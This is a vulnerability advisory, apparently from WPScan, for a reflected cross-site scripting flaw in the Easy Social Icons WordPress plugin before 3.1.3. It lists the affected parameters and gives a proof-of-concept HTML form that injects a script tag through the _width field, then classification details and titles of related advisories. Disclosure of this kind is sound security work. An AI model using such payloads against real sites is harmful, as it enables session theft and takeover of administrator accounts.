Easy Social Icons < 3.1.3 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape user input before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

Affected parameters: _width, _height, _margin, _attr_id, _attr_class

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=cnss_social_icon_option" method="POST">
      <input type="hidden" name="_width" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

easy-social-icons

Fixed in 3.1.3

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

d6b0f74a-dafc-42ef-b0c7-b1a3c59da875

Timeline

Publicly Published

2021-09-02 (about 4 years ago)

Added

2021-09-02 (about 4 years ago)

Last Updated

2021-09-29 (about 4 years ago)

Other

Published

Title

Published

2023-02-17

Title

Simple PDF Viewer <= 1.9 - Contributor+ XSS

Published

2025-11-20

Title

WPBookit < 1.0.7 - Unauthenticated Stored Cross-Site Scripting

Published

2024-08-07

Title

Depicter Slider < 3.2.0 - Authenticated (Editor+) Stored Cross-Site Scripting

Published

2023-02-06

Title

CC Custom Taxonomy <= 1.0.1 - Admin+ Stored XSS

Published

2024-05-14

Title

WP eMember < 10.3.9 - Reflected Cross-Site Scripting